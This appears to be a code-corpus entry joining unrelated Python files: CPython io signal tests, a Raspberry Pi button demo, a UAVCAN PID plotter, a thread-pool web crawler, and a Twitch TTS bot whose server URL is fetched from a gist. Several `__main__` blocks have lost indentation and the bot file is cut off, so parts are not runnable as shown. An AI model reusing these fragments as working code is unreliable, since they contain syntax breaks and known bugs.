        fdopen_kwargs["closefd"] = False
        # Larger than the pipe buffer, so write() is guaranteed to block.
        large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
        try:
            wio = self.io.open(w, **fdopen_kwargs)
            if hasattr(signal, 'pthread_sigmask'):
                # create the thread with SIGALRM signal blocked
                signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
                t.start()
                signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
            else:
                t.start()

            # Fill the pipe enough that the write will be blocking.
            # It will be interrupted by the timer armed above. Since the
            # other thread has read one byte, the low-level write will
            # return with a successful (partial) result rather than an EINTR.
            # The buffered IO layer must check for pending signal
            # handlers, which in this case will invoke alarm_interrupt().
            signal.alarm(1)
            try:
                self.assertRaises(ZeroDivisionError, wio.write, large_data)
            finally:
                signal.alarm(0)
                t.join()

            # We got one byte, get another one and check that it isn't a
            # repeat of the first one.
            read_results.append(os.read(r, 1))
            self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
        finally:
            os.close(w)
            os.close(r)
            # This is deliberate. If we didn't close the file descriptor
            # before closing wio, wio would try to flush its internal
            # buffer, and block again.
            try:
                wio.close()
            except OSError as e:
                if e.errno != errno.EBADF:
                    raise

    def test_interrupted_write_unbuffered(self):
        self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)

    def test_interrupted_write_buffered(self):
        self.check_interrupted_write(b"xy", b"xy", mode="wb")

    def test_interrupted_write_text(self):
        self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")

    @support.no_tracing
    def check_reentrant_write(self, data, **fdopen_kwargs):
        # A write performed from a signal handler while the same stream is
        # mid-write must either be rejected (RuntimeError) or let the
        # handler's exception propagate.
        def on_alarm(*args):
            # Will be called reentrantly from the same thread
            wio.write(data)
            1/0
        signal.signal(signal.SIGALRM, on_alarm)
        r, w = os.pipe()
        wio = self.io.open(w, **fdopen_kwargs)
        try:
            signal.alarm(1)
            # Either the reentrant call to wio.write() fails with RuntimeError,
            # or the signal handler raises ZeroDivisionError.
            with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
                while 1:
                    for i in range(100):
                        wio.write(data)
                        wio.flush()
                    # Make sure the buffer doesn't fill up and block further writes
                    os.read(r, len(data) * 100)
            exc = cm.exception
            if isinstance(exc, RuntimeError):
                self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
        finally:
            signal.alarm(0)
            wio.close()
            os.close(r)

    def test_reentrant_write_buffered(self):
        self.check_reentrant_write(b"xy", mode="wb")

    def test_reentrant_write_text(self):
        self.check_reentrant_write("xy", mode="w", encoding="ascii")

    def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
        """Check that a buffered read, when it gets interrupted (either
        returning a partial result or EINTR), properly invokes the signal
        handler and retries if the latter returned successfully."""
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False
        def alarm_handler(sig, frame):
            os.write(w, b"bar")
        signal.signal(signal.SIGALRM, alarm_handler)
        try:
            rio = self.io.open(r, **fdopen_kwargs)
            os.write(w, b"foo")
            signal.alarm(1)
            # Expected behaviour:
            # - first raw read() returns partial b"foo"
            # - second raw read() returns EINTR
            # - third raw read() returns b"bar"
            self.assertEqual(decode(rio.read(6)), "foobar")
        finally:
            signal.alarm(0)
            rio.close()
            os.close(w)
            os.close(r)

    def test_interrupted_read_retry_buffered(self):
        self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
                                          mode="rb")

    def test_interrupted_read_retry_text(self):
        self.check_interrupted_read_retry(lambda x: x,
                                          mode="r")

    def check_interrupted_write_retry(self, item, **fdopen_kwargs):
        """Check that a buffered write, when it gets interrupted (either
        returning a partial result or EINTR), properly invokes the signal
        handler and retries if the latter returned successfully."""
        select = support.import_module("select")

        # A quantity that exceeds the buffer size of an anonymous pipe's
        # write end.
        N = support.PIPE_MAX_SIZE
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False

        # We need a separate thread to read from the pipe and allow the
        # write() to finish. This thread is started after the SIGALRM is
        # received (forcing a first EINTR in write()).
        read_results = []
        write_finished = False
        error = None
        def _read():
            try:
                while not write_finished:
                    while r in select.select([r], [], [], 1.0)[0]:
                        s = os.read(r, 1024)
                        read_results.append(s)
            except BaseException as exc:
                nonlocal error
                error = exc
        t = threading.Thread(target=_read)
        t.daemon = True
        # First alarm re-arms a second alarm; the second one starts the
        # reader thread, producing partial-write then EINTR then success.
        def alarm1(sig, frame):
            signal.signal(signal.SIGALRM, alarm2)
            signal.alarm(1)
        def alarm2(sig, frame):
            t.start()

        large_data = item * N
        signal.signal(signal.SIGALRM, alarm1)
        try:
            wio = self.io.open(w, **fdopen_kwargs)
            signal.alarm(1)
            # Expected behaviour:
            # - first raw write() is partial (because of the limited pipe buffer
            #   and the first alarm)
            # - second raw write() returns EINTR (because of the second alarm)
            # - subsequent write()s are successful (either partial or complete)
            written = wio.write(large_data)
            self.assertEqual(N, written)

            wio.flush()
            write_finished = True
            t.join()

            self.assertIsNone(error)
            self.assertEqual(N, sum(len(x) for x in read_results))
        finally:
            signal.alarm(0)
            write_finished = True
            os.close(w)
            os.close(r)
            # This is deliberate. If we didn't close the file descriptor
            # before closing wio, wio would try to flush its internal
            # buffer, and could block (in case of failure).
            try:
                wio.close()
            except OSError as e:
                if e.errno != errno.EBADF:
                    raise

    def test_interrupted_write_retry_buffered(self):
        self.check_interrupted_write_retry(b"x", mode="wb")

    def test_interrupted_write_retry_text(self):
        self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
    # Runs SignalsTest against the C implementation of io.
    io = io
class PySignalsTest(SignalsTest):
    # Runs SignalsTest against the pure-Python (_pyio) implementation.
    io = pyio

    # Handling reentrancy issues would slow down _pyio even more, so the
    # tests are disabled.
    test_reentrant_write_buffered = None
    test_reentrant_write_text = None
def load_tests(*args):
    """Build the test suite, injecting the C ("C*" classes) and pure-Python
    ("Py*" classes) io namespaces — plus the matching mock classes — as
    attributes of each test class before collecting it."""
    tests = (CIOTest, PyIOTest, APIMismatchTest,
             CBufferedReaderTest, PyBufferedReaderTest,
             CBufferedWriterTest, PyBufferedWriterTest,
             CBufferedRWPairTest, PyBufferedRWPairTest,
             CBufferedRandomTest, PyBufferedRandomTest,
             StatefulIncrementalDecoderTest,
             CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
             CTextIOWrapperTest, PyTextIOWrapperTest,
             CMiscIOTest, PyMiscIOTest,
             CSignalsTest, PySignalsTest,
             )

    # Put the namespaces of the IO module we are testing and some useful mock
    # classes in the __dict__ of each test.
    mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
             MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
             SlowFlushRawIO)
    all_members = io.__all__ + ["IncrementalNewlineDecoder"]
    c_io_ns = {name : getattr(io, name) for name in all_members}
    py_io_ns = {name : getattr(pyio, name) for name in all_members}
    globs = globals()
    # Mocks are defined in C/Py pairs; pick the matching flavour by prefix.
    c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
    py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
    # Avoid turning open into a bound method.
    py_io_ns["open"] = pyio.OpenWrapper
    for test in tests:
        if test.__name__.startswith("C"):
            for name, obj in c_io_ns.items():
                setattr(test, name, obj)
        elif test.__name__.startswith("Py"):
            for name, obj in py_io_ns.items():
                setattr(test, name, obj)

    suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
    return suite
if __name__ == "__main__":
unittest.main()
|
buttonClassTest.py | import RPi.GPIO as GPIO
import threading
# Use Broadcom (BCM) channel numbering for all GPIO pin references below.
GPIO.setmode(GPIO.BCM)
class ButtonStuff:
    """Demo of RPi.GPIO edge-detect callbacks.

    Button on pin 27 starts a printing thread, button on pin 22 toggles the
    flag that thread watches, and the main thread blocks waiting for a
    falling edge on pin 17.
    """

    def __init__(self):
        # All three inputs use the internal pull-ups (buttons pull to GND).
        for pin in (17, 27, 22):
            GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
        self.boolean = True
        self.doStuff()

    def my_callback(self):
        """Edge callback: hand the work to a fresh thread so the GPIO
        interrupt event queue is not blocked by the print loop."""
        worker = threading.Thread(target=self.thread1)
        worker.start()

    def thread1(self):
        """Print continuously until my_callback2() flips the flag off."""
        while self.boolean:
            print("lala")

    def my_callback2(self):
        """Edge callback: toggle the print-loop flag."""
        self.boolean = not self.boolean
        print("button2")

    def doStuff(self):
        """Wire up the edge callbacks, then block until pin 17 falls."""
        print("Make sure you have a button connected so that when pressed")
        print("it will connect GPIO port 23 (pin 16) to GND (pin 6)\n")
        print("You will also need a second button connected so that when pressed")
        print("it will connect GPIO port 24 (pin 18) to 3V3 (pin 1)")
        # Rising-edge callbacks fire on their own thread, even while the
        # main thread is blocked in wait_for_edge() below.
        GPIO.add_event_detect(27, GPIO.RISING, callback=lambda x: self.my_callback())
        GPIO.add_event_detect(22, GPIO.RISING, callback=lambda x: self.my_callback2())
        try:
            print("Waiting for falling edge on port 23")
            GPIO.wait_for_edge(17, GPIO.FALLING)
            print("Falling edge detected. Here endeth the second lesson.")
        except KeyboardInterrupt:
            GPIO.cleanup()  # clean up GPIO on CTRL+C exit
        GPIO.cleanup()  # clean up GPIO on normal exit
def main():
    """Run the button demo; ButtonStuff.__init__ drives the whole session."""
    ButtonStuff()
if __name__ == '__main__':main() |
pid_plot.py | import argparse
import logging
import sys
import threading
import time
import uavcan
import numpy as np
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
from ..network.UavcanNode import UavcanNode
from ..network.NodeStatusMonitor import NodeStatusMonitor
from ..network.SetpointPublisher import ControlTopic, SetpointPublisher
from ..viewers.LivePlotter import LivePlotter
from ..viewers.Selector import Selector
from ..viewers.NestedDict import NestedDictView
from ..viewers.helpers import vstack, hstack
from ..viewers.wrappers import LineEdit, ComboBox
from .param_tree import ParameterTreeModel
def argparser(parser=None):
    """Build (or extend) the command-line parser for the PID plotter.

    Args:
        parser: optional existing ArgumentParser to add arguments to;
            a new one is created when None.

    Returns:
        The configured ArgumentParser.
    """
    parser = parser or argparse.ArgumentParser(description=__doc__)
    parser.add_argument("interface", help="Serial port or SocketCAN interface")
    parser.add_argument("--dsdl", "-d", help="DSDL path", required=True)
    # type=int so a value given on the command line matches the integer
    # default; previously a CLI-supplied node id reached UavcanNode as a str.
    parser.add_argument("--node_id", "-n", help="UAVCAN Node ID", type=int, default=127)
    parser.add_argument('--verbose', '-v', action='count', default=0)
    return parser
class PidViewer(QtGui.QWidget):
    """Main widget of the PID plotter: node/loop selectors, parameter tree,
    setpoint-generator controls and the live plot, laid out side by side.

    All callbacks are left as None here; the controller wires them up.
    """

    def __init__(self, parent = None):
        super(PidViewer, self).__init__(parent)

        self.node_selector = Selector()
        self.pid_loop_selector = Selector()
        self.plot = LivePlotter(buffer_size=300)
        self.params_view = NestedDictView()
        self.save_button = QtGui.QPushButton('Save')
        # Setpoint generator inputs (topic plus min/max/period sweep values).
        self.topic = ComboBox(title="Topic \t", callback=None, items=list(ControlTopic), parent=parent)
        self.value_min = LineEdit(title="Value min \t", callback=None, parent=parent)
        self.value_max = LineEdit(title="Value max \t", callback=None, parent=parent)
        self.period = LineEdit(title="Period [s] \t", callback=None, parent=parent)

        # Left column: parameters/save/setpoint controls;
        # right column: PID loop selector above the live plot.
        self.setLayout(vstack([
            self.node_selector,
            hstack([
                vstack([
                    self.params_view,
                    self.save_button,
                    self.topic,
                    self.value_min,
                    self.value_max,
                    self.period,
                ]),
                vstack([
                    self.pid_loop_selector,
                    self.plot.widget,
                ]),
            ]),
        ]))
        self.setWindowTitle("PID Plotter")
        self.show()
class SetpointPublisherModel:
    """Adapter turning GUI widget callbacks into SetpointPublisher updates.

    Each update_* method coerces the widget's string value to the type the
    publisher expects, then refreshes the publisher.
    """

    def __init__(self, node, topic, motor, value_min, value_max, period):
        self.publisher = SetpointPublisher(node, ControlTopic(topic), motor, value_min, value_max, period)

    def _apply(self, attr, value):
        # Every setter follows the same assign-then-refresh pattern.
        setattr(self.publisher, attr, value)
        self.publisher.update()

    def update_motor(self, value):
        self._apply('motor', int(value))

    def update_topic(self, value):
        self._apply('topic', ControlTopic(value))

    def update_value_min(self, value_min):
        self._apply('value_min', float(value_min))

    def update_value_max(self, value_max):
        self._apply('value_max', float(value_max))

    def update_period(self, value):
        self._apply('period', float(value))
class PidFeedbackRecorder():
    """Records (setpoint, measured) samples from the cvra motor feedback
    topics for the currently tracked node and PID loop.

    Use ``on_new_node(callback)`` to be notified when a new named node
    appears on the bus; read the samples from ``self.data``.
    """

    PID_LOOPS = ['Current', 'Velocity', 'Position']
    # Template shape only — never assign this object to self.data directly:
    # _pid_callback() rebinds the nested arrays inside self.data, which
    # would silently mutate a shared template.
    EMPTY_DATA = {'setpoint': {'time': np.array([]), 'value': np.array([])},
                  'measured': {'time': np.array([]), 'value': np.array([])}, }

    def __init__(self, node):
        self.logger = logging.getLogger('PidFeedbackRecorder')
        self.node = node
        # Instance state; these used to be class-level mutable attributes,
        # which would have been shared between instances.
        self.nodes = []
        self.on_new_node_callback = None
        self.tracked_node = None
        self.tracked_pid_loop = self.PID_LOOPS[0]
        self.data_lock = threading.RLock()
        self.monitor = NodeStatusMonitor(node)
        self.monitor.on_new_node(self._update_nodes)
        self.setpt_pub = SetpointPublisherModel(node, topic='voltage', motor=1, value_min=0, value_max=0, period=1)
        self.clear()
        self.node.add_handler(uavcan.thirdparty.cvra.motor.feedback.CurrentPID, self._current_pid_callback)
        self.node.add_handler(uavcan.thirdparty.cvra.motor.feedback.VelocityPID, self._velocity_pid_callback)
        self.node.add_handler(uavcan.thirdparty.cvra.motor.feedback.PositionPID, self._position_pid_callback)
        self.params_model = ParameterTreeModel(node)
        self.params_model.on_new_node(self._update_nodes)

    def on_new_node(self, callback):
        """Register *callback*, invoked whenever a new named node is seen.

        Stored in a separate attribute: the previous code overwrote this
        method with the callback, and crashed with a TypeError if a node
        was discovered before any callback had been registered.
        """
        self.on_new_node_callback = callback

    def node_id_to_name(self, node_id):
        """Proxy to the status monitor's node-id -> name mapping."""
        return self.monitor.node_id_to_name(node_id)

    def clear(self):
        """Drop all recorded samples (thread-safe)."""
        with self.data_lock:
            # Build a brand-new structure instead of aliasing EMPTY_DATA:
            # aliasing let the feedback callbacks pollute the template, so
            # clearing stopped working after the first recording.
            self.data = {'setpoint': {'time': np.array([]), 'value': np.array([])},
                         'measured': {'time': np.array([]), 'value': np.array([])}}

    def _update_nodes(self):
        """Refresh the list of named nodes and notify the registered callback."""
        known_nodes = self.monitor.known_nodes
        nodes_with_name = {k: v for k, v in known_nodes.items() if 'name' in v.keys()}
        self.nodes = [info['name'] for info in nodes_with_name.values()]
        if self.on_new_node_callback is not None:
            self.on_new_node_callback()

    def _current_pid_callback(self, event):
        if self.tracked_pid_loop == 'Current':
            self._pid_callback(node_id=event.transfer.source_node_id,
                               setpoint=event.message.current_setpoint,
                               measured=event.message.current)

    def _velocity_pid_callback(self, event):
        if self.tracked_pid_loop == 'Velocity':
            self._pid_callback(node_id=event.transfer.source_node_id,
                               setpoint=event.message.velocity_setpoint,
                               measured=event.message.velocity)

    def _position_pid_callback(self, event):
        if self.tracked_pid_loop == 'Position':
            self._pid_callback(node_id=event.transfer.source_node_id,
                               setpoint=event.message.position_setpoint,
                               measured=event.message.position)

    def _pid_callback(self, node_id, setpoint, measured):
        """Append one sample pair if it comes from the tracked node."""
        node_name = self.monitor.node_id_to_name(node_id)
        if self.tracked_node is not None and self.tracked_node == node_name:
            current_time = time.time()
            # Take the lock so clear() cannot interleave with the appends.
            with self.data_lock:
                self.data['setpoint']['time'] = np.append(self.data['setpoint']['time'], current_time)
                self.data['measured']['time'] = np.append(self.data['measured']['time'], current_time)
                self.data['setpoint']['value'] = np.append(self.data['setpoint']['value'], setpoint)
                self.data['measured']['value'] = np.append(self.data['measured']['value'], measured)
class PidPlotController:
    """Wires the PID feedback recorder (model) to the Qt viewer, and keeps
    the live plot refreshed from a background thread."""

    def __init__(self, node):
        self.logger = logging.getLogger('PidPlotController')
        self.node = node
        self.model = PidFeedbackRecorder(node)
        self.viewer = PidViewer()
        self.curve = self.viewer.plot.getPort()

        # Model -> view and view -> model wiring.
        self.model.on_new_node(self.update_selection)
        self.viewer.node_selector.set_callback(self._change_selected_node)
        self.viewer.pid_loop_selector.set_nodes(self.model.PID_LOOPS)
        self.viewer.pid_loop_selector.set_callback(self._change_selected_pid_loop)
        self.viewer.params_view.on_edit(self._on_param_edit)
        self.model.params_model.on_new_params(self.viewer.params_view.set)
        self.viewer.save_button.clicked.connect(self._save_params)
        self.viewer.topic.callback = self.model.setpt_pub.update_topic
        self.viewer.value_min.callback = self.model.setpt_pub.update_value_min
        self.viewer.value_max.callback = self.model.setpt_pub.update_value_max
        self.viewer.period.callback = self.model.setpt_pub.update_period

        # daemon=True: run() loops forever, so a non-daemon thread would keep
        # the process alive after the Qt event loop exits.
        threading.Thread(target=self.run, daemon=True).start()

    def run(self):
        """Background loop pushing the recorded data to the plot at 5 Hz."""
        self.logger.info('PID widget started')
        while True:
            self.curve.put(self.model.data)
            time.sleep(0.2)

    def update_selection(self):
        """Refresh the node selector when a new node is discovered."""
        self.logger.debug('New node detected, updating available nodes list')
        self.viewer.node_selector.set_nodes(self.model.nodes)

    def _change_selected_node(self, i):
        """Track node *i*, reset recorded data, and fetch its parameters."""
        self.model.tracked_node = self.model.nodes[i]
        self.model.clear()
        self.logger.info('Selected node {}'.format(self.model.tracked_node))
        self.model.params_model.fetch_params(self.selected_node_id(), self.model.tracked_node)
        self.model.setpt_pub.update_motor(self.selected_node_id())

    def _change_selected_pid_loop(self, i):
        """Switch the tracked PID loop and drop previously recorded samples."""
        self.model.tracked_pid_loop = self.model.PID_LOOPS[i]
        # Assign a fresh structure (not model.EMPTY_DATA, whose nested arrays
        # can be rebound in place by the feedback callbacks).
        self.model.data = {
            'setpoint': {'time': np.array([]), 'value': np.array([])},
            'measured': {'time': np.array([]), 'value': np.array([])},
        }
        self.logger.info('Selected PID loop {}'.format(self.model.tracked_pid_loop))

    def _on_param_edit(self, item):
        """Push an edited parameter value to the tracked node."""
        target_id = self.model.monitor.name_to_node_id(self.model.tracked_node)
        keys = self.model.params_model.item_to_path(item)
        name = '/'.join(keys)
        value = item.text()
        value_type = self.model.params_model.params.get(keys).type
        self.model.params_model.set_param(target_id=target_id, name=name, value=value, value_type=value_type)
        self.logger.debug('Parameter {name} changed to {value} for node {node} ({target_id})'.format(
            name=name, value=item.text(), node=self.model.tracked_node, target_id=target_id))

    def _save_params(self):
        """Persist the currently selected node's parameters.

        The previous version also computed the selector index and known-node
        list here without using them; that dead code was removed.
        """
        self.model.params_model.save_params(self.selected_node_id())

    def selected_node_id(self):
        """Return the node id of the entry currently selected in the UI."""
        index = self.viewer.node_selector.currentIndex()
        items = list(self.model.monitor.known_nodes.items())
        return int(items[index][0])
def main(args):
    """Entry point: configure logging, Qt, DSDL types and the UAVCAN node,
    then start the controller and spin."""
    # Each -v flag lowers the logging threshold by 10 (more verbose).
    logging.basicConfig(level=max(logging.CRITICAL - (10 * args.verbose), 0))

    app = QtGui.QApplication(sys.argv)
    app.setFont(QtGui.QFont('Open Sans', pointSize=20))

    uavcan.load_dsdl(args.dsdl)

    node = UavcanNode(interface=args.interface, node_id=args.node_id)
    # Keep a reference so the controller (and its thread) stays alive.
    controller = PidPlotController(node=node)

    node.spin()
    # Start the Qt event loop unless we are in an interactive session.
    if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
        QtGui.QApplication.instance().exec_()
if __name__ == '__main__':
args = argparser().parse_args()
main(args)
|
multi_thread_eg.py | import queue
import requests
from lxml import etree
import time
import threading
# Listing URLs for pages 1..50 of the cnblogs front page.
urls = [
    f'https://www.cnblogs.com/#p{page}'
    for page in range(1, 51)
]
def craw(url):
    """Download *url* and return its HTML, decoded as UTF-8."""
    resp = requests.get(url)
    resp.encoding = 'utf-8'
    return resp.text
def parse(html):
    """Extract the post titles from a cnblogs listing page."""
    document = etree.HTML(html)
    # XPath selects the anchor text of each entry in the post list.
    return document.xpath('//*[@id="post_list"]/article/section/div/a/text()')
def do_craw(url_queue: queue.Queue, html_Queue: queue.Queue):
    """Crawler worker: fetch URLs from *url_queue* until it is exhausted,
    pushing each page's HTML onto *html_Queue*."""
    while True:
        try:
            # get_nowait() avoids the empty()/get() race of the previous
            # version: with several workers, another thread could consume
            # the last URL between the two calls, leaving a plain get()
            # blocked forever.
            url = url_queue.get_nowait()
        except queue.Empty:
            break
        html = craw(url)
        html_Queue.put(html)
        print(threading.current_thread().name, f'craw-{url}', 'url.queue.size=', url_queue.qsize())
def do_parse(html_queue: queue.Queue, fout):
    """Parser worker: take pages from *html_queue*, write extracted titles
    to *fout*.

    Exits once *html_queue* stays empty while the module-global ``url_queue``
    is also drained (i.e. the crawlers are done).
    """
    while True:
        try:
            # Bounded wait instead of the previous empty()+get() pair: the
            # empty() check was racy with multiple consumers, and a plain
            # get() could block forever after the crawlers finished.
            html = html_queue.get(timeout=1)
        except queue.Empty:
            if url_queue.empty():
                break
            continue
        results = parse(html)
        for result in results:
            fout.write(str(result) + '\n')
        print(threading.current_thread().name, f'results.size', len(results), 'html_queue.size', html_queue.qsize())
if __name__ == '__main__':
    # Fill the work queue, then run 10 crawler and 10 parser threads.
    url_queue = queue.Queue()
    html_queue = queue.Queue()
    for url in urls:
        url_queue.put(url)

    crawl_thread = []
    parse_thread = []
    start = time.time()
    for idx in range(1, 11):
        t = threading.Thread(target=do_craw, args=(url_queue, html_queue), name=f'craw{idx}')
        t.start()
        crawl_thread.append(t)

    fout = open('D:\\PYproject\\example_\\q.txt', 'w', encoding='utf-8')
    for idx in range(1, 11):
        t = threading.Thread(target=do_parse, args=(html_queue, fout), name=f'parse{idx}')
        t.start()
        parse_thread.append(t)

    for t in crawl_thread:
        t.join()
    for t in parse_thread:
        t.join()
    # Close the output once every parser is done (it used to be leaked,
    # relying on interpreter shutdown to flush the file).
    fout.close()

    end = time.time()
    print(f'结束 共花费了{end-start}s')
|
web_bot_controllable_talknet.py | import os
from typing import Text
import numpy as np
import tensorflow as tf
from scipy.io import wavfile
import json
from tqdm import tqdm
import traceback
import ffmpeg
from flask import Flask, request, render_template, send_from_directory, Response
from argparse import ArgumentParser
import transformers
from transformers import AutoModelForSequenceClassification
from transformers import AutoTokenizer
import numpy as np
from scipy.special import softmax
import csv
import time
import rtmidi
import requests
from twitchio.ext import commands
from dotenv import load_dotenv
load_dotenv()
# Open the MIDI output used to drive the character animation rig.
midiout = rtmidi.MidiOut()
available_ports = midiout.get_ports()
#detect position element in list
def detect(list, element):
    """Return the index of *element* in *list*, or None when absent.

    Note: the parameter name shadows the builtin ``list``; kept as-is
    for backward compatibility with existing callers.
    Fix: the original fell off the end and returned None implicitly,
    which then crashed ``midiout.open_port(None)`` silently downstream;
    the miss case is now explicit so callers can guard against it.
    """
    for idx, item in enumerate(list):
        if item == element:
            return idx
    return None  # element not found — caller must handle this
# Locate the virtual loopback port. detect() yields None when the port
# is missing, which makes open_port raise — assumes loopMIDI is running.
port= detect(available_ports, 'loopMIDI 1')
midiout.open_port(port) # Select midi port
RUN_PATH = os.path.dirname(os.path.realpath(__file__))
def preprocess(text):
    """Mask @mentions and links the way the sentiment model expects."""
    tokens = []
    for tok in text.split(" "):
        if tok.startswith('@') and len(tok) > 1:
            tok = '@user'
        elif tok.startswith('http'):
            tok = 'http'
        tokens.append(tok)
    return " ".join(tokens)
def play(note, duration):
    """Send a MIDI note-on, hold it for *duration* seconds, then note-off."""
    note_on = [0x90, note, 0x7f]
    note_off = [0x80, note, 0x7f]
    midiout.send_message(note_on)
    time.sleep(duration)
    midiout.send_message(note_off)
def signals(i):
    """Map a sentiment label to the MIDI note that triggers its animation.

    Fix: the original returned the string "Invalid day of week" for an
    unknown label (wrong domain — these are sentiments, not weekdays),
    and that string was then sent as a MIDI data byte by play(), which
    fails. Unknown labels now fall back to the neutral note.
    """
    switcher = {
        "negative": 40,
        "neutral": 36,
        "positive": 38,
    }
    return switcher.get(i, 36)
def list2file(l,f):
    """Serialize *l* as pretty-printed JSON to the path *f*."""
    with open(f, 'w') as handle:
        json.dump(l, handle, indent=6)
def file2list(file):
    """Load and return the JSON content of *file*."""
    with open(file, 'r') as handle:
        return json.load(handle)
def load_history(f,conversation):
    """Replay a saved chat-log JSON file into *conversation* and return it."""
    for entry in file2list(f):
        # keep the explicit == False check: non-bool truthy values
        # (e.g. the string "false") must go down the user branch
        if entry["is_user"] == False:
            conversation.append_response(entry["text"])
            conversation.mark_processed()
        else:
            conversation.add_user_input(entry["text"])
    return conversation
#smart splits that are not cutting words
def smart_split(str,max_lenght):
    """Split *str* into word-preserving chunks of roughly *max_lenght* chars.

    Historical quirk preserved: the first chunk keeps a leading space,
    later chunks do not.
    """
    chunks = []
    running = 0
    current = ""
    for word in str.split():
        running += len(word)
        if running < max_lenght:
            current = current + " " + word
        else:
            # flush the current chunk and restart the count with this word
            chunks.append(current)
            running = len(word)
            current = word
    # flush whatever is left after the final word
    chunks.append(current)
    if not chunks:
        chunks = [str]
    return chunks
def smart_split_list(full_text,max_lenght):
    """Split on sentence boundaries first, then length-limit each sentence."""
    pieces = []
    for sentence in full_text.split(". "):
        pieces.extend(smart_split(sentence, max_lenght))
    return pieces
def blande_sentiment(url_server,UTTERANCE,name="test"):
    """Query the TTS/sentiment server; return (label, answer, wave URL)."""
    url = url_server + "/?text=" + UTTERANCE + "&author=" + name
    print(url)
    response = requests.get(url)
    print(response.text)
    # server replies with a JSON triple: [answer, label, wave URL]
    resp = json.loads(response.text)
    answer = resp[0]
    label = resp[1]
    waveurl = resp[2]
    print(label)
    print(answer)
    return label,answer,waveurl
def sanitize_input(input_str):
    """Strip known emoticons and normalize whitespace/quotes/parentheses."""
    # remove every emoticon listed in the asset file
    for emoticon in readListFromFile("Assets/emoticon.lst"):
        input_str = input_str.replace(emoticon.strip(), '')
    result = input_str.strip()
    return (result.replace("\n", " ").replace("\r", " ").replace("\t", " ")
            .replace("’", "'").replace("“", "\"").replace("”", "\"")
            .replace("‘", "").replace("(", ",").replace(")", ","))
def sanitize_output(text):
    """Flatten whitespace, normalize quotes, and pad '?' with a comma for pacing."""
    replacements = (
        ("\n", " "), ("\r", " "), ("\t", " "),
        ("’", "'"), ("“", "\""), ("”", "\""), ("?", "?,"),
    )
    for old, new in replacements:
        text = text.replace(old, new)
    return text
def play_audio_buffer(buffer,rate):
    """Play a raw PCM buffer at *rate* and block until playback finishes.

    The 2, 2 arguments are channels / bytes-per-sample per simpleaudio's
    play_buffer signature — TODO confirm against the audio source format.
    """
    import simpleaudio as sa
    sa.play_buffer(buffer, 2, 2, rate).wait_done()
# script exit
def play_audio(audio_path):
    """
    Play an audio file with ffplay, slightly slowed (atempo=0.9); blocks
    until playback ends. Returns a traceback string on failure, else None.
    """
    try:
        import subprocess
        cmd = ["ffplay", "-nodisp", "-af", "atempo=0.9", "-autoexit",
               "-hide_banner", "-loglevel", "error", audio_path]
        subprocess.call(cmd)
    except Exception:
        return str(traceback.format_exc())
def readListFromFile(file_path):
    """Return every line of *file_path* as a list (newlines preserved)."""
    with open(file_path, 'r') as handle:
        return handle.readlines()
def readFile(file_path):
    """Return the full text content of *file_path*."""
    with open(file_path, 'r') as handle:
        return handle.read()
def writeFile(fileName, text):
    """Write *text* to *fileName*, truncating any existing content.

    Fix: use a context manager so the handle is closed even when the
    write raises (the original leaked the handle on exceptions).
    """
    with open(fileName, "w") as f:
        f.write(text)
def launch_voice(question,author):
    """Voice *question* through the remote TTS pipeline and play the result.

    Creates ./.lock while busy so the Twitch bot skips incoming messages,
    and removes it when done.

    NOTE(review): in manual mode (author == "") `waveurl` is never assigned,
    so play_audio(waveurl) below raises NameError — confirm intended flow.
    NOTE(review): when the sanitized text is empty (emoticon-only input),
    `l` and `answer` are also undefined at the play()/print() calls below.
    """
    #create file .lock
    writeFile("./.lock", "")
    if author == "":
        print("NO auth, enter in manual mode")
        answer=sanitize_input(question)
        l= "neutral" #getSentiment(answer,DEVICE2,model_sent,tokenizer_sent)
        delay=0
    else:
        #get text
        req_text = sanitize_input(question)
        if req_text!="":
            print("Sanitized input: "+req_text)
            writeFile("current.txt", f"{author}'s turn!")
            #get answer and sentiment
            #read content of https://gist.githubusercontent.com/Nuked88/55e78cb995bce277b4482d836c811fb0/raw/gistfile1.txt
            # the gist holds the current TTS server URL, fetched at call time
            url= requests.get("https://gist.githubusercontent.com/Nuked88/55e78cb995bce277b4482d836c811fb0/raw/gistfile1.txt")
            l,answer,waveurl = blande_sentiment(url.text,req_text,author)
            answer = sanitize_output(f"{answer}")
        else:
            print("Skip because it's emoticon only")
            delay=15
            wav_name="ok"
    #send midi for control the character
    play(signals(l),1.5)
    print(f"Playing audio of: {answer}")
    play_audio(waveurl)
    writeFile("current.txt", f" ")
    #remove file .lock
    os.remove("./.lock")
from threading import Thread
b = 1  # NOTE(review): unused module-level value — appears to be dead code
class Bot(commands.Bot):
    """Twitch chat bot that forwards incoming messages to the TTS pipeline."""

    def __init__(self):
        # Initialise our Bot with our access token, prefix and a list of channels to join on boot...
        super().__init__(token=os.environ['TMI_TOKEN'],
                         client_id=os.environ['CLIENT_ID'],
                         nick=os.environ['BOT_NICK'],
                         prefix="!",
                         initial_channels=[os.environ['CHANNEL']])

    async def event_ready(self):
        # We are logged in and ready to chat and use commands...
        print(f'Logged in as | {self.nick}')

    async def event_message(self, message):
        """Voice each chat message on a worker thread, unless a clip is playing."""
        print(f"Message received: {message.content} from {message.author.name}")
